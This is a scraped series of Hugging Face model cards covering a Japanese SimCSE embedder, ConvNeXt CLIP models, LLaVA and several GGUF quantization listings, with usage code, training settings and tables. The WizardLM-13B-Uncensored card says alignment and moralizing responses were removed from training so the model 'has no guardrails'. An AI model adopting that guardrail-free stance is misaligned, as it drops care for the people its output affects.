- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
cl-nagoya/sup-simcse-ja-large | cl-nagoya | "2023-10-05T06:33:57Z" | 3,557 | 11 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"ja",
"dataset:shunk031/jsnli",
"license:cc-by-sa-4.0",
"autotrain_compatible",
"text-embeddings-inference",
"region:us"
] | feature-extraction | "2023-10-02T09:43:39Z" | ---
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
datasets:
- shunk031/jsnli
license: cc-by-sa-4.0
language:
- ja
metrics:
- spearmanr
library_name: sentence-transformers
inference: false
---
# sup-simcse-ja-large
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U fugashi[unidic-lite] sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["こんにちは、世界!", "文埋め込み最高!文埋め込み最高と叫びなさい", "極度乾燥しなさい"]
model = SentenceTransformer("cl-nagoya/sup-simcse-ja-large")
embeddings = model.encode(sentences)
print(embeddings)
```
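Since this is a sentence-similarity model, a natural follow-up (a small sketch reusing the same sentences as above) is to compare the embeddings with cosine similarity:

```python
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("cl-nagoya/sup-simcse-ja-large")
sentences = ["こんにちは、世界!", "文埋め込み最高!文埋め込み最高と叫びなさい", "極度乾燥しなさい"]
embeddings = model.encode(sentences)

# Pairwise cosine similarities between the three sentences
print(util.cos_sim(embeddings, embeddings))
```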
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
def cls_pooling(model_output, attention_mask):
return model_output[0][:,0]
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained("cl-nagoya/sup-simcse-ja-large")
model = AutoModel.from_pretrained("cl-nagoya/sup-simcse-ja-large")
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, cls pooling.
sentence_embeddings = cls_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Model Summary
- Fine-tuning method: Supervised SimCSE
- Base model: [cl-tohoku/bert-large-japanese-v2](https://huggingface.co/cl-tohoku/bert-large-japanese-v2)
- Training dataset: [JSNLI](https://nlp.ist.i.kyoto-u.ac.jp/?%E6%97%A5%E6%9C%AC%E8%AA%9ESNLI%28JSNLI%29%E3%83%87%E3%83%BC%E3%82%BF%E3%82%BB%E3%83%83%E3%83%88)
- Pooling strategy: cls (with an extra MLP layer only during training)
- Hidden size: 1024
- Learning rate: 5e-5
- Batch size: 512
- Temperature: 0.05
- Max sequence length: 64
- Number of training examples: 2^20
- Validation interval (steps): 2^6
- Warmup ratio: 0.1
- Dtype: BFloat16
See the [GitHub repository](https://github.com/hppRC/simple-simcse-ja) for a detailed experimental setup.
## Citing & Authors
```
@misc{
hayato-tsukagoshi-2023-simple-simcse-ja,
author = {Hayato Tsukagoshi},
title = {Japanese Simple-SimCSE},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/hppRC/simple-simcse-ja}}
}
``` |
laion/CLIP-convnext_base_w-laion2B-s13B-b82K | laion | "2023-04-18T22:05:45Z" | 3,555 | 3 | open_clip | [
"open_clip",
"safetensors",
"clip",
"zero-shot-image-classification",
"arxiv:2201.03545",
"arxiv:1910.04867",
"license:mit",
"region:us"
] | zero-shot-image-classification | "2023-01-03T00:22:20Z" | ---
license: mit
library_name: open_clip
pipeline_tag: zero-shot-image-classification
tags:
- clip
---
# Model Card for CLIP-convnext_base_w-320.laion2B-s13B-b82K
# Table of Contents
1. [Model Details](#model-details)
2. [Uses](#uses)
3. [Training Details](#training-details)
4. [Evaluation](#evaluation)
5. [Acknowledgements](#acknowledgements)
6. [Citation](#citation)
# Model Details
## Model Description
A series of CLIP [ConvNeXt-Base](https://arxiv.org/abs/2201.03545) (w/ wide embed dim) models trained on subsets LAION-5B (https://laion.ai/blog/laion-5b/) using OpenCLIP (https://github.com/mlfoundations/open_clip).
Goals:
* Explore an alternative to ViT and ResNet (w/ AttentionPooling) CLIP models that scales well with model size and image resolution
Firsts:
* First known ConvNeXt CLIP models trained at scale in the range of CLIP ViT-B/16 and RN50x4 models
* First released model weights exploring increase of augmentation + regularization for image tower via adding (greater scale range of RRC, random erasing, stochastic depth)
The models utilize the [timm](https://github.com/rwightman/pytorch-image-models) ConvNeXt-Base model (`convnext_base`) as the image tower, and the same text tower as the RN50x4 (depth 12, embed dim 640) model from OpenAI CLIP. The base models are trained at 256x256 image resolution and roughly match the RN50x4 models on FLOPs and activation counts. The models with `320` in the name are trained at 320x320.
All models in this series were trained for 13B samples and have ImageNet Zero-Shot top-1 of >= 70.8%. Comparing to ViT-B/16 at 34B SS with zero-shot of 70.2% (68.1% for 13B SS) this suggests the ConvNeXt architecture may be more sample efficient in this range of model scale. More experiments needed to confirm.
| Model | Dataset | Resolution | AugReg | Top-1 ImageNet Zero-Shot (%) |
| ----- | ------- | ---------- | ------------ | --------- |
| [convnext_base_w.laion2b_s13b_b82k](https://huggingface.co/laion/CLIP-convnext_base_w-laion2B-s13B-b82K) | LAION-2B | 256x256 | RRC (0.9, 1.0) | 70.8 |
| [convnext_base_w.laion2b_s13b_b82k_augreg](https://huggingface.co/laion/CLIP-convnext_base_w-laion2B-s13B-b82K-augreg) | LAION-2B | 256x256 | RRC (0.33, 1.0), RE (0.35), SD (0.1) | 71.5 |
| [convnext_base_w.laion_aesthetic_s13b_b82k](https://huggingface.co/laion/CLIP-convnext_base_w-laion_aesthetic-s13B-b82K) | LAION-A | 256x256 | RRC (0.9, 1.0) | 71.0 |
| [convnext_base_w_320.laion_aesthetic_s13b_b82k](https://huggingface.co/laion/CLIP-convnext_base_w_320-laion_aesthetic-s13B-b82K) | LAION-A | 320x320 | RRC (0.9, 1.0) | 71.7 |
| [convnext_base_w_320.laion_aesthetic_s13b_b82k_augreg](https://huggingface.co/laion/CLIP-convnext_base_w_320-laion_aesthetic-s13B-b82K-augreg) | LAION-A | 320x320 | RRC (0.33, 1.0), RE (0.35), SD (0.1) | 71.3 |
RRC = Random Resize Crop (crop pcts), RE = Random Erasing (prob), SD = Stochastic Depth (prob) -- image tower only
LAION-A = LAION Aesthetic, an ~900M sample subset of LAION-2B with pHash dedupe and aesthetic score filtering.
Model training done by Ross Wightman across both the [stability.ai](https://stability.ai/) cluster and the [JUWELS Booster](https://apps.fz-juelich.de/jsc/hps/juwels/booster-overview.html) supercomputer. See acknowledgements below.
# Uses
As per the original [OpenAI CLIP model card](https://github.com/openai/CLIP/blob/d50d76daa670286dd6cacf3bcd80b5e4823fc8e1/model-card.md), this model is intended as a research output for research communities. We hope that this model will enable researchers to better understand and explore zero-shot, arbitrary image classification. We also hope it can be used for interdisciplinary studies of the potential impact of such models.
The OpenAI CLIP paper includes a discussion of potential downstream impacts to provide an example for this sort of analysis. Additionally, the LAION-5B blog (https://laion.ai/blog/laion-5b/) and upcoming paper include additional discussion as it relates specifically to the training dataset.
## Direct Use
Zero-shot image classification, image and text retrieval, among others.
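A minimal zero-shot classification sketch with the OpenCLIP API (the image path and label set are placeholders) could look like this:

```python
import torch
from PIL import Image
import open_clip

model, _, preprocess = open_clip.create_model_and_transforms('hf-hub:laion/CLIP-convnext_base_w-laion2B-s13B-b82K')
tokenizer = open_clip.get_tokenizer('hf-hub:laion/CLIP-convnext_base_w-laion2B-s13B-b82K')
model.eval()

image = preprocess(Image.open("example.jpg")).unsqueeze(0)  # placeholder image path
text = tokenizer(["a diagram", "a dog", "a cat"])           # placeholder label set

with torch.no_grad():
    image_features = model.encode_image(image)
    text_features = model.encode_text(text)
    image_features /= image_features.norm(dim=-1, keepdim=True)
    text_features /= text_features.norm(dim=-1, keepdim=True)
    probs = (100.0 * image_features @ text_features.T).softmax(dim=-1)

print("Label probs:", probs)
```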
## Downstream Use
Image classification and other image task fine-tuning, linear probe image classification, image generation guiding and conditioning, among others.
## Out-of-Scope Use
As per the OpenAI models,
**Any** deployed use case of the model - whether commercial or not - is currently out of scope. Non-deployed use cases such as image search in a constrained environment, are also not recommended unless there is thorough in-domain testing of the model with a specific, fixed class taxonomy. This is because our safety assessment demonstrated a high need for task specific testing especially given the variability of CLIP’s performance with different class taxonomies. This makes untested and unconstrained deployment of the model in any use case currently potentially harmful.
Certain use cases which would fall under the domain of surveillance and facial recognition are always out-of-scope regardless of performance of the model. This is because the use of artificial intelligence for tasks such as these can be premature currently given the lack of testing norms and checks to ensure its fair use.
Since the model has not been purposefully trained in or evaluated on any languages other than English, its use should be limited to English language use cases.
Further the above notice, the LAION-5B dataset used in training of these models has additional considerations, see below.
# Training Details
## Training Data
This model was trained with one of (see table in intro):
* LAION-2B - A 2 billion sample English subset of LAION-5B (https://laion.ai/blog/laion-5b/).
* LAION-Aesthetic - A 900M sample subset of LAION-2B with pHash dedupe and aesthetic score filtering
**IMPORTANT NOTE:** The motivation behind dataset creation is to democratize research and experimentation around large-scale multi-modal model training and handling of uncurated, large-scale datasets crawled from publically available internet. Our recommendation is therefore to use the dataset for research purposes. Be aware that this large-scale dataset is uncurated. Keep in mind that the uncurated nature of the dataset means that collected links may lead to strongly discomforting and disturbing content for a human viewer. Therefore, please use the demo links with caution and at your own risk. It is possible to extract a “safe” subset by filtering out samples based on the safety tags (using a customized trained NSFW classifier that we built). While this strongly reduces the chance for encountering potentially harmful content when viewing, we cannot entirely exclude the possibility for harmful content being still present in safe mode, so that the warning holds also there. We think that providing the dataset openly to broad research and other interested communities will allow for transparent investigation of benefits that come along with training large-scale models as well as pitfalls and dangers that may stay unreported or unnoticed when working with closed large datasets that remain restricted to a small community. Providing our dataset openly, we however do not recommend using it for creating ready-to-go industrial products, as the basic research about general properties and safety of such large-scale models, which we would like to encourage with this release, is still in progress.
## Training Procedure
All models were trained with a global batch size of 81920 for 64 checkpoint intervals of 203.7M samples for a total of ~13B samples seen over training.
For 256x256 models, the slurm srun script below was used on 20 8-GPU (A100 40GB) nodes (Stability), switching to 40 4-GPU nodes for a period of time on JUWELS.
```
/opt/slurm/sbin/srun --cpu_bind=v --accel-bind=gn python -m training.main \
--save-frequency 1 \
--name "convnext_256" \
--resume 'latest' \
    --train-data="pipe:aws s3 cp s3://mybucket/path/laion{00000..xxxxx}.tar -" \
--train-num-samples 203666042 \
--dataset-type webdataset \
--precision amp_bfloat16 \
--warmup 10000 \
--batch-size=512 \
--epochs=64 \
--dataset-resampled \
--clip-grad-norm 5.0 \
--lr 1e-3 \
--workers=6 \
--model "convnext_base_w" \
--seed 0 \
--ddp-static-graph \
--local-loss \
--gather-with-grad \
--grad-checkpointing
```
For 320x320 models, the same as above was used but with 32 8-GPU nodes and a local batch size of 320, or 64 4-GPU nodes on JUWELS.
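As a quick sanity check of the figures above (not part of the training code), the global batch size and total sample count follow directly from the node counts and local batch sizes:
```python
# Sanity check of the schedule figures quoted above (illustrative only).
nodes, gpus_per_node, local_batch = 20, 8, 512        # 256x256 runs on the Stability cluster
global_batch = nodes * gpus_per_node * local_batch    # = 81920
samples_per_interval = 203_666_042                    # --train-num-samples
total_samples = 64 * samples_per_interval             # ~13.0B samples seen
print(global_batch, total_samples)

# 320x320 runs: 32 nodes x 8 GPUs x local batch 320 gives the same global batch size
assert 32 * 8 * 320 == global_batch
```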
# Evaluation
Evaluation done with code in the [LAION CLIP Benchmark suite](https://github.com/LAION-AI/CLIP_benchmark).
## Testing Data, Factors & Metrics
### Testing Data
The testing is performed with VTAB+ (a combination of VTAB (https://arxiv.org/abs/1910.04867) with additional robustness datasets) for classification, and COCO and Flickr for retrieval.
## Results
The models achieve between 70.8 and 71.7 zero-shot top-1 accuracy on ImageNet-1k.

An initial round of benchmarks has been performed on a wider range of datasets, viewable at https://github.com/LAION-AI/CLIP_benchmark/blob/main/benchmark/results.ipynb
As part of exploring increased augmentation + regularization, early evaluations suggest that `augreg`-trained models evaluate well over a wider range of resolutions. This is especially true for the 320x320 LAION-A model, where the augreg run scored lower than the non-augreg run when evaluated at the train resolution of 320x320 (71.3 vs 71.7), but improves to 72.2 when evaluated at 384x384 (the non-augreg drops to 71.0 at 384x384).
# Acknowledgements
Acknowledging [stability.ai](https://stability.ai/) and the Gauss Centre for Supercomputing e.V. (http://gauss-centre.eu) for funding this part of the work by providing computing time through the John von Neumann Institute for Computing (NIC) on the GCS Supercomputer JUWELS Booster at Jülich Supercomputing Centre (JSC).
# Citation
**BibTeX:**
LAION-5B
```bibtex
@inproceedings{schuhmann2022laionb,
title={{LAION}-5B: An open large-scale dataset for training next generation image-text models},
author={Christoph Schuhmann and
Romain Beaumont and
Richard Vencu and
Cade W Gordon and
Ross Wightman and
Mehdi Cherti and
Theo Coombes and
Aarush Katta and
Clayton Mullis and
Mitchell Wortsman and
Patrick Schramowski and
Srivatsa R Kundurthy and
Katherine Crowson and
Ludwig Schmidt and
Robert Kaczmarczyk and
Jenia Jitsev},
booktitle={Thirty-sixth Conference on Neural Information Processing Systems Datasets and Benchmarks Track},
year={2022},
url={https://openreview.net/forum?id=M3Y74vmsMcY}
}
```
OpenCLIP software
```bibtex
@software{ilharco_gabriel_2021_5143773,
author = {Ilharco, Gabriel and
Wortsman, Mitchell and
Wightman, Ross and
Gordon, Cade and
Carlini, Nicholas and
Taori, Rohan and
Dave, Achal and
Shankar, Vaishaal and
Namkoong, Hongseok and
Miller, John and
Hajishirzi, Hannaneh and
Farhadi, Ali and
Schmidt, Ludwig},
title = {OpenCLIP},
month = jul,
year = 2021,
note = {If you use this software, please cite it as below.},
publisher = {Zenodo},
version = {0.1},
doi = {10.5281/zenodo.5143773},
url = {https://doi.org/10.5281/zenodo.5143773}
}
```
OpenAI CLIP paper
```bibtex
@inproceedings{Radford2021LearningTV,
title={Learning Transferable Visual Models From Natural Language Supervision},
author={Alec Radford and Jong Wook Kim and Chris Hallacy and A. Ramesh and Gabriel Goh and Sandhini Agarwal and Girish Sastry and Amanda Askell and Pamela Mishkin and Jack Clark and Gretchen Krueger and Ilya Sutskever},
booktitle={ICML},
year={2021}
}
```
```bibtex
@Article{liu2022convnet,
author = {Zhuang Liu and Hanzi Mao and Chao-Yuan Wu and Christoph Feichtenhofer and Trevor Darrell and Saining Xie},
title = {A ConvNet for the 2020s},
journal = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)},
year = {2022},
}
```
```bibtex
@misc{rw2019timm,
author = {Ross Wightman},
title = {PyTorch Image Models},
year = {2019},
publisher = {GitHub},
journal = {GitHub repository},
doi = {10.5281/zenodo.4414861},
howpublished = {\url{https://github.com/rwightman/pytorch-image-models}}
}
``` |
duyntnet/WizardLM-13B-Uncensored-imatrix-GGUF | duyntnet | "2024-05-20T04:07:06Z" | 3,555 | 5 | transformers | [
"transformers",
"gguf",
"imatrix",
"WizardLM-13B-Uncensored",
"text-generation",
"en",
"license:other",
"region:us"
] | text-generation | "2024-05-20T00:08:43Z" | ---
license: other
language:
- en
pipeline_tag: text-generation
inference: false
tags:
- transformers
- gguf
- imatrix
- WizardLM-13B-Uncensored
---
Quantizations of https://huggingface.co/cognitivecomputations/WizardLM-13B-Uncensored
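Below is a minimal inference sketch using `llama-cpp-python`; the quant file name and prompt style are assumptions, so substitute whichever GGUF you downloaded and check the original model card for the expected template.
```python
# Minimal llama-cpp-python sketch.
# The file name and prompt format below are assumptions, not taken from this repo.
from llama_cpp import Llama

llm = Llama(model_path="WizardLM-13B-Uncensored.Q4_K_M.gguf", n_ctx=2048)
out = llm("USER: Write a limerick about llamas.\nASSISTANT:", max_tokens=128)
print(out["choices"][0]["text"])
```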
# From original readme
This is WizardLM trained with a subset of the dataset - responses that contained alignment / moralizing were removed. The intent is to train a WizardLM that doesn't have alignment built-in, so that alignment (of any sort) can be added separately, for example with an RLHF LoRA.
Shout out to the open source AI/ML community, and everyone who helped me out.
Note:
An uncensored model has no guardrails.
You are responsible for anything you do with the model, just as you are responsible for anything you do with any dangerous object such as a knife, gun, lighter, or car.
Publishing anything this model generates is the same as publishing it yourself.
You are responsible for the content you publish, and you cannot blame the model any more than you can blame the knife, gun, lighter, or car for what you do with it. |
mradermacher/Generate_Question_Mistral_7B-GGUF | mradermacher | "2024-06-11T15:11:00Z" | 3,554 | 0 | transformers | [
"transformers",
"gguf",
"LLM",
"llama",
"Mistral",
"en",
"base_model:FPHam/Generate_Question_Mistral_7B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-11T12:34:46Z" | ---
base_model: FPHam/Generate_Question_Mistral_7B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- LLM
- llama
- Mistral
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/FPHam/Generate_Question_Mistral_7B
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
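As a rough sketch, multi-part quants that are plain byte splits (for example `.part1of2`-style files) can be joined by simple concatenation; files produced by llama.cpp's `gguf-split` tool need its merge command instead. The part names below are hypothetical:
```python
# Join a split GGUF by byte concatenation, in order.
# The part names are hypothetical; use the actual file names from the repo.
import shutil

parts = ["model.gguf.part1of2", "model.gguf.part2of2"]
with open("model.gguf", "wb") as out:
    for part in parts:
        with open(part, "rb") as f:
            shutil.copyfileobj(f, out)
```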
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Generate_Question_Mistral_7B-GGUF/resolve/main/Generate_Question_Mistral_7B.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mys/ggml_llava-v1.5-7b | mys | "2023-10-09T13:47:55Z" | 3,551 | 97 | null | [
"gguf",
"llava",
"lmm",
"ggml",
"llama.cpp",
"region:us"
] | null | "2023-10-09T05:34:11Z" | ---
tags:
- llava
- lmm
- ggml
- llama.cpp
---
# ggml_llava-v1.5-7b
This repo contains GGUF files to inference [llava-v1.5-7b](https://huggingface.co/liuhaotian/llava-v1.5-7b) with [llama.cpp](https://github.com/ggerganov/llama.cpp) end-to-end without any extra dependency.
**Note**: The `mmproj-model-f16.gguf` file structure is experimental and may change. Always use the latest code in llama.cpp.
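For reference, a minimal multimodal sketch using `llama-cpp-python` is shown below; the quantized model file name and image path are assumptions, and the exact message schema may differ between library versions.
```python
# Minimal LLaVA inference sketch via llama-cpp-python.
# The quant file name and image path are assumptions; mmproj-model-f16.gguf is from this repo.
from llama_cpp import Llama
from llama_cpp.llama_chat_format import Llava15ChatHandler

chat_handler = Llava15ChatHandler(clip_model_path="mmproj-model-f16.gguf")
llm = Llama(
    model_path="ggml-model-q4_k.gguf",
    chat_handler=chat_handler,
    n_ctx=2048,
    logits_all=True,  # some library versions require this for image embeddings
)

out = llm.create_chat_completion(messages=[
    {"role": "user", "content": [
        {"type": "image_url", "image_url": {"url": "file:///path/to/image.jpg"}},
        {"type": "text", "text": "Describe this image in one sentence."},
    ]},
])
print(out["choices"][0]["message"]["content"])
```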
|
bartowski/phi3-4x4b-v1-GGUF | bartowski | "2024-06-03T23:40:50Z" | 3,550 | 0 | null | [
"gguf",
"phi3",
"nlp",
"moe",
"text-generation",
"dataset:BEE-spoke-data/gutenberg-en-v1-clean",
"dataset:NeelNanda/pile-10k",
"license:mit",
"region:us"
] | text-generation | "2024-06-03T23:18:02Z" | ---
license: mit
tags:
- phi3
- nlp
- moe
datasets:
- BEE-spoke-data/gutenberg-en-v1-clean
- NeelNanda/pile-10k
quantized_by: bartowski
pipeline_tag: text-generation
---
## Llamacpp imatrix Quantizations of phi3-4x4b-v1
Using <a href="https://github.com/ggerganov/llama.cpp/">llama.cpp</a> release <a href="https://github.com/ggerganov/llama.cpp/releases/tag/b3070">b3070</a> for quantization.
Original model: https://huggingface.co/Fizzarolli/phi3-4x4b-v1
All quants made using imatrix option with dataset from [here](https://gist.github.com/bartowski1182/eb213dccb3571f863da82e99418f81e8)
## Prompt format
```
<s><|user|> {prompt}<|end|><|assistant|><|end|>
```
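As a hedged example, the template can be filled and run with `llama-cpp-python` as sketched below; the file name is whichever quant you download from the table, and the context size is an assumption.
```python
# Fill the prompt template above and generate with llama-cpp-python.
# The file name and n_ctx are assumptions; the trailing <|end|> from the template is used as the stop token.
from llama_cpp import Llama

llm = Llama(model_path="phi3-4x4b-v1-Q4_K_M.gguf", n_ctx=4096)
prompt = "<s><|user|> Explain what a mixture of experts is in one sentence.<|end|><|assistant|>"
out = llm(prompt, max_tokens=128, stop=["<|end|>"])
print(out["choices"][0]["text"])
```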
## Download a file (not the whole branch) from below:
| Filename | Quant type | File Size | Description |
| -------- | ---------- | --------- | ----------- |
| [phi3-4x4b-v1-Q8_0.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q8_0.gguf) | Q8_0 | 11.76GB | Extremely high quality, generally unneeded but max available quant. |
| [phi3-4x4b-v1-Q6_K.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q6_K.gguf) | Q6_K | 9.08GB | Very high quality, near perfect, *recommended*. |
| [phi3-4x4b-v1-Q5_K_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q5_K_M.gguf) | Q5_K_M | 7.85GB | High quality, *recommended*. |
| [phi3-4x4b-v1-Q5_K_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q5_K_S.gguf) | Q5_K_S | 7.62GB | High quality, *recommended*. |
| [phi3-4x4b-v1-Q4_K_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q4_K_M.gguf) | Q4_K_M | 6.70GB | Good quality, uses about 4.83 bits per weight, *recommended*. |
| [phi3-4x4b-v1-Q4_K_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q4_K_S.gguf) | Q4_K_S | 6.30GB | Slightly lower quality with more space savings, *recommended*. |
| [phi3-4x4b-v1-IQ4_XS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ4_XS.gguf) | IQ4_XS | 5.91GB | Decent quality, smaller than Q4_K_S with similar performance, *recommended*. |
| [phi3-4x4b-v1-Q3_K_L.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q3_K_L.gguf) | Q3_K_L | 5.78GB | Lower quality but usable, good for low RAM availability. |
| [phi3-4x4b-v1-Q3_K_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q3_K_M.gguf) | Q3_K_M | 5.33GB | Even lower quality. |
| [phi3-4x4b-v1-IQ3_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ3_M.gguf) | IQ3_M | 4.93GB | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| [phi3-4x4b-v1-Q3_K_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q3_K_S.gguf) | Q3_K_S | 4.79GB | Low quality, not recommended. |
| [phi3-4x4b-v1-IQ3_XS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ3_XS.gguf) | IQ3_XS | 4.54GB | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| [phi3-4x4b-v1-IQ3_XXS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ3_XXS.gguf) | IQ3_XXS | 4.25GB | Lower quality, new method with decent performance, comparable to Q3 quants. |
| [phi3-4x4b-v1-Q2_K.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-Q2_K.gguf) | Q2_K | 4.07GB | Very low quality but surprisingly usable. |
| [phi3-4x4b-v1-IQ2_M.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ2_M.gguf) | IQ2_M | 3.74GB | Very low quality, uses SOTA techniques to also be surprisingly usable. |
| [phi3-4x4b-v1-IQ2_S.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ2_S.gguf) | IQ2_S | 3.43GB | Very low quality, uses SOTA techniques to be usable. |
| [phi3-4x4b-v1-IQ2_XS.gguf](https://huggingface.co/bartowski/phi3-4x4b-v1-GGUF/blob/main/phi3-4x4b-v1-IQ2_XS.gguf) | IQ2_XS | 3.34GB | Very low quality, uses SOTA techniques to be usable. |
## Downloading using huggingface-cli
First, make sure you have huggingface-cli installed:
```
pip install -U "huggingface_hub[cli]"
```
Then, you can target the specific file you want:
```
